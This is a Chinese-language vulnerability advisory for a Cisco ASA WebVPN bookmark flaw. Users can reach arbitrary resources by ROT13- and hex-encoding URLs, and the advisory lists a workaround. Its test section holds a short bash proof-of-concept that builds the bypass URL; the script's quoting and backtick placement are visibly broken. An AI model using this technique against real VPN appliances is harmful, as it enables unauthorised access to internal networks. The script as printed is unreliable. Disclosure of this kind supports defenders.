Cisco ASA WebVPN书签功能绕过安全限制漏洞

受影响系统:

Cisco ASA 8.2
Cisco ASA 8.1
Cisco ASA 8.0
Cisco ASA 7.2
Cisco ASA 7.1
Cisco ASA 7.0

描述:

Cisco自适应安全设备(ASA)是可提供安全和VPN服务的模块化平台。

Cisco ASA为管理员提供了无客户端SSL VPN会话以访问公司资源的选项,其中一个功能是可以通过向登录页面添加书签来自定义WebVPN portal页面。书签中的链接(URL)使用ROT13替换进行了混淆,并将ASCII字符转换为了16进制。拥有有效账号但没有URL entry的用户可以使用ROT13加密URL、将ASCII字符转换为16进制并将这个字符串附加到Cisco VPN SSL URL就可以访问任意内部或外部资源。

<*来源:David Eduardo Acosta Rodrguez (deacosta@isecauditors.com
  
  链接:
http://secunia.com/advisories/37710/
        http://marc.info/?l=bugtraq&m=126106497327046&w=2
        http://tools.cisco.com/security/center/viewAlert.x?alertId=19609
*>

测试方法:

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!#!/bin/bash
echo -n "write URL:"
read a
b=`echo -n $a | tr ‘[a-m][n-z][A-M][N-Z]’ ‘[n-z][a-m][N-Z][A-M]’ | od
-tx1 | cut  -c8- | sed ‘s/ //g’` | paste -s -d ”;
echo -n "URL "
echo -n "https://[CISCOVPNSSL]/+CSCO+00"; echo -n $b; echo -n "++";
echo "";

建议:

 

临时解决方法:

* 设置webtype ACL和filter阻断Web VPN SSL中的访问。

厂商补丁:

Cisco
—–
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.cisco.com/warp/public/707/advisory.html

发表评论?

0 条评论。

发表评论